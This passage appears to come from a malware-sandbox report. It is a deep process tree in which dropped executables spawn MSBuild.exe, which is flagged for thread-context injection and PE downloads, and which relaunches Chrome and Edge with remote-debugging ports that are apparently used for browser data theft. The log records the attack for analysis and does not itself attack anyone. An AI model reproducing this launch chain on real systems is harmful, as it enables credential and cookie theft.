                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2264,i,9506818085128228516,10236388225707062011,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:2
                                                                  13⤵
                                                                    PID:9212
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2380,i,9506818085128228516,10236388225707062011,262144 --variations-seed-version --mojo-platform-channel-handle=2620 /prefetch:8
                                                                    13⤵
                                                                      PID:6340
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3340,i,9506818085128228516,10236388225707062011,262144 --variations-seed-version --mojo-platform-channel-handle=3412 /prefetch:1
                                                                      13⤵
                                                                      • Uses browser remote debugging
                                                                      PID:6440
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3324,i,9506818085128228516,10236388225707062011,262144 --variations-seed-version --mojo-platform-channel-handle=3408 /prefetch:1
                                                                      13⤵
                                                                      • Uses browser remote debugging
                                                                      PID:6432
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\KKFCFBKFCF.exe"
                                                                  11⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:6560
                                                                  • C:\Users\Admin\KKFCFBKFCF.exe
                                                                    "C:\Users\Admin\KKFCFBKFCF.exe"
                                                                    12⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:6716
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                      13⤵
                                                                      • Downloads MZ/PE file
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Checks processor information in registry
                                                                      PID:7032
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                        14⤵
                                                                        • Uses browser remote debugging
                                                                        • Drops file in Windows directory
                                                                        • Checks processor information in registry
                                                                        • Enumerates system info in registry
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:7180
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff9d591dcf8,0x7ff9d591dd04,0x7ff9d591dd10
                                                                          15⤵
                                                                            PID:1796
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2468,i,8790504653083983018,11753871052673528784,262144 --variations-seed-version --mojo-platform-channel-handle=2440 /prefetch:2
                                                                            15⤵
                                                                              PID:6744
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1596,i,8790504653083983018,11753871052673528784,262144 --variations-seed-version --mojo-platform-channel-handle=2560 /prefetch:3
                                                                              15⤵
                                                                                PID:6808
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2096,i,8790504653083983018,11753871052673528784,262144 --variations-seed-version --mojo-platform-channel-handle=1720 /prefetch:8
                                                                                15⤵
                                                                                  PID:6440
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2992,i,8790504653083983018,11753871052673528784,262144 --variations-seed-version --mojo-platform-channel-handle=3408 /prefetch:1
                                                                                  15⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:6884
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3008,i,8790504653083983018,11753871052673528784,262144 --variations-seed-version --mojo-platform-channel-handle=3032 /prefetch:1
                                                                                  15⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:8724
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3992,i,8790504653083983018,11753871052673528784,262144 --variations-seed-version --mojo-platform-channel-handle=4012 /prefetch:2
                                                                                  15⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:1456
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4644,i,8790504653083983018,11753871052673528784,262144 --variations-seed-version --mojo-platform-channel-handle=4652 /prefetch:1
                                                                                  15⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:6764
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5320,i,8790504653083983018,11753871052673528784,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:8
                                                                                  15⤵
                                                                                    PID:6164
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5352,i,8790504653083983018,11753871052673528784,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:8
                                                                                    15⤵
                                                                                      PID:8404
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                    14⤵
                                                                                    • Uses browser remote debugging
                                                                                    PID:8996
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
                                                                                      15⤵
                                                                                      • Uses browser remote debugging
                                                                                      • Drops file in Windows directory
                                                                                      • Enumerates system info in registry
                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                      PID:8736
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x308,0x7ff9d620f208,0x7ff9d620f214,0x7ff9d620f220
                                                                                        16⤵
                                                                                          PID:8116
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=312,i,2942955085854608589,4425999645761029385,262144 --variations-seed-version --mojo-platform-channel-handle=2748 /prefetch:3
                                                                                          16⤵
                                                                                            PID:12872
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2720,i,2942955085854608589,4425999645761029385,262144 --variations-seed-version --mojo-platform-channel-handle=2708 /prefetch:2
                                                                                            16⤵
                                                                                              PID:13052
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2108,i,2942955085854608589,4425999645761029385,262144 --variations-seed-version --mojo-platform-channel-handle=2756 /prefetch:8
                                                                                              16⤵
                                                                                                PID:11056
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3496,i,2942955085854608589,4425999645761029385,262144 --variations-seed-version --mojo-platform-channel-handle=3516 /prefetch:1
                                                                                                16⤵
                                                                                                • Uses browser remote debugging
                                                                                                PID:6984
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3508,i,2942955085854608589,4425999645761029385,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
                                                                                                16⤵
                                                                                                • Uses browser remote debugging
                                                                                                PID:6920
                                                                                          • C:\ProgramData\gdjmozcb16.exe
                                                                                            "C:\ProgramData\gdjmozcb16.exe"
                                                                                            14⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:31012
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              15⤵
                                                                                                PID:31100
                                                                                            • C:\ProgramData\79rq1vs0zu.exe
                                                                                              "C:\ProgramData\79rq1vs0zu.exe"
                                                                                              14⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:31200
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                15⤵
                                                                                                • Downloads MZ/PE file
                                                                                                • Loads dropped DLL
                                                                                                • Checks processor information in registry
                                                                                                PID:31252
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                  16⤵
                                                                                                  • Uses browser remote debugging
                                                                                                  • Drops file in Windows directory
                                                                                                  • Checks processor information in registry
                                                                                                  • Enumerates system info in registry
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                  PID:29440
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x1c8,0x22c,0x7ff9d591dcf8,0x7ff9d591dd04,0x7ff9d591dd10
                                                                                                    17⤵
                                                                                                      PID:29424
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1944,i,3697569971152410563,1447622750504795159,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:3
                                                                                                      17⤵
                                                                                                        PID:29224
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2064,i,3697569971152410563,1447622750504795159,262144 --variations-seed-version --mojo-platform-channel-handle=2060 /prefetch:2
                                                                                                        17⤵
                                                                                                          PID:29212
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2260,i,3697569971152410563,1447622750504795159,262144 --variations-seed-version --mojo-platform-channel-handle=2432 /prefetch:8
                                                                                                          17⤵
                                                                                                            PID:29156
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,3697569971152410563,1447622750504795159,262144 --variations-seed-version --mojo-platform-channel-handle=3156 /prefetch:1
                                                                                                            17⤵
                                                                                                            • Uses browser remote debugging
                                                                                                            PID:29092
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,3697569971152410563,1447622750504795159,262144 --variations-seed-version --mojo-platform-channel-handle=3184 /prefetch:1
                                                                                                            17⤵
                                                                                                            • Uses browser remote debugging
                                                                                                            PID:29088
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4204,i,3697569971152410563,1447622750504795159,262144 --variations-seed-version --mojo-platform-channel-handle=4184 /prefetch:2
                                                                                                            17⤵
                                                                                                            • Uses browser remote debugging
                                                                                                            PID:28980
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4612,i,3697569971152410563,1447622750504795159,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:1
                                                                                                            17⤵
                                                                                                            • Uses browser remote debugging
                                                                                                            PID:28752
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5248,i,3697569971152410563,1447622750504795159,262144 --variations-seed-version --mojo-platform-channel-handle=5236 /prefetch:8
                                                                                                            17⤵
                                                                                                              PID:28380
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5492,i,3697569971152410563,1447622750504795159,262144 --variations-seed-version --mojo-platform-channel-handle=5508 /prefetch:8
                                                                                                              17⤵
                                                                                                                PID:26228
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                              16⤵
                                                                                                              • Uses browser remote debugging
                                                                                                              PID:18648
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
                                                                                                                17⤵
                                                                                                                • Uses browser remote debugging
                                                                                                                • Drops file in Windows directory
                                                                                                                • Checks processor information in registry
                                                                                                                • Enumerates system info in registry
                                                                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                PID:18636
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x308,0x7ff9d620f208,0x7ff9d620f214,0x7ff9d620f220
                                                                                                                  18⤵
                                                                                                                    PID:18608
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1884,i,5402779961470908878,5148514253902326762,262144 --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:3
                                                                                                                    18⤵
                                                                                                                      PID:18328
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2548,i,5402779961470908878,5148514253902326762,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:2
                                                                                                                      18⤵
                                                                                                                        PID:18312
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1844,i,5402779961470908878,5148514253902326762,262144 --variations-seed-version --mojo-platform-channel-handle=2916 /prefetch:8
                                                                                                                        18⤵
                                                                                                                          PID:18296
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3464,i,5402779961470908878,5148514253902326762,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
                                                                                                                          18⤵
                                                                                                                          • Uses browser remote debugging
                                                                                                                          PID:13432
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3492,i,5402779961470908878,5148514253902326762,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1
                                                                                                                          18⤵
                                                                                                                          • Uses browser remote debugging
                                                                                                                          PID:13424
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5412,i,5402779961470908878,5148514253902326762,262144 --variations-seed-version --mojo-platform-channel-handle=5516 /prefetch:8
                                                                                                                          18⤵
                                                                                                                            PID:32208
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5408,i,5402779961470908878,5148514253902326762,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:8
                                                                                                                            18⤵
                                                                                                                              PID:32216
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5808,i,5402779961470908878,5148514253902326762,262144 --variations-seed-version --mojo-platform-channel-handle=5820 /prefetch:8
                                                                                                                              18⤵
                                                                                                                                PID:32252
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\GHJEGCAEGI.exe"
                                                                                                                            16⤵
                                                                                                                              PID:29076
                                                                                                                              • C:\Users\Admin\GHJEGCAEGI.exe
                                                                                                                                "C:\Users\Admin\GHJEGCAEGI.exe"
                                                                                                                                17⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:32324
                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                  18⤵
                                                                                                                                  • Downloads MZ/PE file
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  PID:10120
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                    19⤵
                                                                                                                                    • Uses browser remote debugging
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Enumerates system info in registry
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                    PID:32564
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff9d591dcf8,0x7ff9d591dd04,0x7ff9d591dd10
                                                                                                                                      20⤵
                                                                                                                                        PID:32608
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1608,i,15480021977984473286,12777690966095072249,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:3
                                                                                                                                        20⤵
                                                                                                                                          PID:29532
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2136,i,15480021977984473286,12777690966095072249,262144 --variations-seed-version --mojo-platform-channel-handle=2132 /prefetch:2
                                                                                                                                          20⤵
                                                                                                                                            PID:29452
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
